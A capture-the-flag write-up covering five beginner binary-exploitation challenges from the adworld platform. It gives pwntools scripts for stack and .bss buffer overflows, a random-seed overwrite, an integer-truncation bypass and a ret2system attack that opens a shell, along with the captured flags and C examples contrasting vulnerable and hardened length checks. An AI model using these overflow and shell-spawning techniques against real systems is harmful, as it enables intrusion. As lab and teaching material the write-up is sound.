
攻防世界 (adworld) Beginner Area, PWN Section: Write-Up

 2 years ago
source link: https://iamywang.github.io/2020/adworld-pwn-1/

0x01 guess_num

checksec

Stack executable, Canary present, PIE enabled.

IDA analysis

A guess-the-number game: guess 10 random numbers in a row correctly to get the flag.

The input string lives at rsp+10h and the seed at rsp+30h.
So fill 20h bytes first, then overwrite the random-number seed.

Payload construction

payload = 'A' * 0x20 + p64(1)
The random seed becomes 1.
With that seed the sequence produced is: 2 5 4 2 6 2 5 1 4 2

Python script

from pwn import *

p = remote('220.249.52.133', 36834)

# 0x20 bytes fill the name buffer (rsp+0x10) up to the seed (rsp+0x30),
# then p64(1) overwrites the seed with 1
payload = b'A' * 0x20 + p64(1)
p.sendlineafter(b'Your name:', payload)

# the sequence that seed 1 produces
for n in [2, 5, 4, 2, 6, 2, 5, 1, 4, 2]:
    p.sendlineafter(b'number:', str(n).encode())
p.interactive()
cyberpeace{cdece09e67aec66f2211ee4176f1f555}

0x02 int_overflow

checksec

Stack executable, no Canary, no PIE.

There is a what_is_this function that simply cats the flag; its address is 0x804868B.
Look at the login function and use its overflow.
Note that dest is 0x14 bytes long.
Make the return address point at the cat-flag function.

payload && flag

from pwn import *

p = remote('220.249.52.133', 37973)

# 0x14 bytes fill dest, 4 bytes cover the saved ebp, then the return address
# becomes what_is_this; the rest pads the total length to 259
payload = b'A' * 0x14 + b'A' * 0x4 + p32(0x804868B) + b'A' * (259 - 0x14 - 0x4 - 0x4)
p.sendlineafter(b'choice:', b'1')
p.sendlineafter(b'username:', b'test')
p.sendlineafter(b'passwd:', payload)
p.interactive()

flag: cyberpeace{fe888549b805068ba1e6202e4e773ae9}
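Why a 259-byte password gets past the length check: the challenge name and the payload length point to an 8-bit length variable. The example below is added here and is not the challenge's code; it assumes the check stores strlen() in a uint8_t and accepts lengths in the range 4..8, and it reproduces the write-up's input (259 'A' bytes plus the '\n' that sendline appends, 260 bytes, which wraps to 4). The hardened version keeps the length in size_t and bounds the copy by the destination size.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DEST_LEN 0x14   /* size of dest in login(), as stated in the write-up */

/* Assumed shape of the vulnerable check: the password length is held in an
 * 8-bit variable before the range test, so any length >= 256 wraps around.
 * Returns the number of bytes strcpy(dest, passwd) would then write, or 0 if
 * the password is rejected. */
size_t accepted_len_truncated(const char *passwd) {
    uint8_t len = (uint8_t)strlen(passwd);   /* 260 becomes 4 */
    if (len <= 3 || len > 8)
        return 0;
    return strlen(passwd) + 1;               /* strcpy copies the whole string plus NUL */
}

/* Hardened check: keep the real length in size_t and bound the copy by the
 * destination size, so wrap-around cannot bypass the range test. */
size_t accepted_len_fixed(char *dest, size_t dest_len, const char *passwd) {
    size_t len = strlen(passwd);
    if (len <= 3 || len > 8 || len + 1 > dest_len)
        return 0;
    memcpy(dest, passwd, len + 1);
    return len + 1;
}

/* Constructed input matching the write-up: 259 'A' bytes followed by the
 * '\n' that sendline() appends, 260 bytes in total. */
static void build_writeup_input(char *passwd) {
    memset(passwd, 'A', 259);
    passwd[259] = '\n';
    passwd[260] = '\0';
}

/* Bytes the truncated check would let strcpy write into the 0x14-byte dest. */
size_t demo_truncated(void) {
    char passwd[261];
    build_writeup_input(passwd);
    return accepted_len_truncated(passwd);   /* 261 */
}

/* The same input against the fixed check: rejected, nothing copied. */
size_t demo_fixed(void) {
    char passwd[261], dest[DEST_LEN];
    build_writeup_input(passwd);
    return accepted_len_fixed(dest, sizeof dest, passwd);   /* 0 */
}

int main(void) {
    printf("truncated check lets strcpy write %zu bytes into a %d-byte buffer\n",
           demo_truncated(), DEST_LEN);
    printf("fixed check copies %zu bytes\n", demo_fixed());
    return 0;
}
```

The detail that matters for anyone reading the disassembly is the width of the variable holding the length: a uint8_t comparison looks correct in isolation, and only the combination with an unbounded strcpy into a 0x14-byte buffer makes it exploitable.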

0x03 hello_pwn

No canary found NX enabled No PIE

IDA analysis

A buffer overflow in the .bss segment.
unk_601068 is 4 bytes; the overflow reaches the dword_60106C that follows it.

read(0, &unk_601068, 0x10uLL);
if ( dword_60106C == 1853186401 )
    sub_400686();
return 0LL;

payload

from pwn import *

p = remote('220.249.52.133', 39152)

# 4 bytes fill unk_601068, then the comparison value lands in dword_60106C
payload = b'A' * 0x4 + p64(1853186401)
p.sendlineafter(b'bof', payload)
p.interactive()

cyberpeace{74d21a7fa6658cc0583194d86cc2a014}
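The decompiled snippet above reads 0x10 bytes into a 4-byte .bss object, so the next 12 bytes land in whatever follows it; guess_num (the seed after the name buffer) and when_did_you_born (the birth year after the name) are the same adjacent-overwrite pattern on the stack. The example below is added here and is not the challenge's code: it models the .bss layout as a struct (buf at the position of unk_601068, key at dword_60106C, padding so the 0x10-byte copy stays inside the object), compares the write-up's `read(0, ..., 0x10)` with a copy bounded by the buffer's own size, and assumes a little-endian host as x86-64 is.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed model of the challenge's .bss: a 4-byte buffer at 0x601068
 * immediately followed by the 4-byte value at 0x60106C. The padding keeps
 * the 0x10-byte copy inside this object, so the demonstration has no UB. */
struct bss_model {
    char    buf[4];      /* unk_601068 */
    int32_t key;         /* dword_60106C */
    char    rest[8];
};

#define MAGIC 1853186401   /* the constant compared in the decompiled snippet */

/* Vulnerable: copies up to 0x10 bytes starting at buf, exactly as
 * read(0, &unk_601068, 0x10) does, so bytes 4..15 land past buf. */
int vulnerable_check(struct bss_model *s, const unsigned char *in, size_t n) {
    if (n > 0x10) n = 0x10;
    memcpy(s, in, n);
    return s->key == MAGIC;
}

/* Hardened: bound the copy by the size of the buffer itself. */
int hardened_check(struct bss_model *s, const unsigned char *in, size_t n) {
    if (n > sizeof s->buf) n = sizeof s->buf;
    memcpy(s->buf, in, n);
    return s->key == MAGIC;
}

/* Constructed input mirroring the write-up's payload: 4 filler bytes, then
 * the 8 bytes p64(1853186401) yields (magic as little-endian, high dword 0). */
size_t build_input(unsigned char *out) {
    uint32_t v = MAGIC;
    memset(out, 'A', 4);
    memcpy(out + 4, &v, 4);   /* assumes a little-endian host */
    memset(out + 8, 0, 4);
    return 12;
}

/* 1: the unbounded read sets key to MAGIC, so sub_400686() would be called. */
int demo_vulnerable(void) {
    struct bss_model s = {0};
    unsigned char in[0x10];
    size_t n = build_input(in);
    return vulnerable_check(&s, in, n);
}

/* 0: the bounded copy leaves key untouched. */
int demo_hardened(void) {
    struct bss_model s = {0};
    unsigned char in[0x10];
    size_t n = build_input(in);
    return hardened_check(&s, in, n);
}

int main(void) {
    printf("unbounded read reaches key: %d\n", demo_vulnerable());
    printf("bounded read reaches key:   %d\n", demo_hardened());
    return 0;
}
```

When reviewing code like this, the check to make is whether the length passed to read() (or the size implied by gets/strcpy) is derived from the destination's size; a literal such as 0x10 against a 4-byte object is the whole bug, and it shows up in the decompiler output directly.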

0x04 when_did_you_born

from pwn import *

p = remote('220.249.52.133', 41239)

# 8 bytes fill the name buffer, then 1926 overwrites the birth-year field
payload = b'A' * 0x8 + p64(1926)
p.sendlineafter(b'Your Birth?', b'1999')
p.sendlineafter(b'Your Name?', payload)
p.interactive()

cyberpeace{c3ca2fbd84f939f07a7d9b32caec7991}

0x05 cgpwn2

Basic idea: put /bin/sh in the .bss segment (the name buffer), then overwrite the return address with system and pass the address of name as its argument, which runs sh.

from pwn import *

p = remote('220.249.52.133', 35902)

# address of the name buffer in .bss, where /bin/sh is stored
name_addr = 0x0804A080

# address of system, taken from the binary's symbol table
elf = ELF('../bin/cgpwn2')
system_addr = elf.symbols['system']
# system_addr = 0x08048420
# print(hex(system_addr))

# 0x26 bytes reach the saved ebp, 4 more cover it, then the return address
# (system), a dummy return address for system, and its argument (name_addr)
payload = b'A' * 0x26 + b'A' * 0x4 + p32(system_addr) + p32(0) + p32(name_addr)

p.sendlineafter(b'name', b'/bin/sh')
p.sendlineafter(b'here:', payload)
p.interactive()

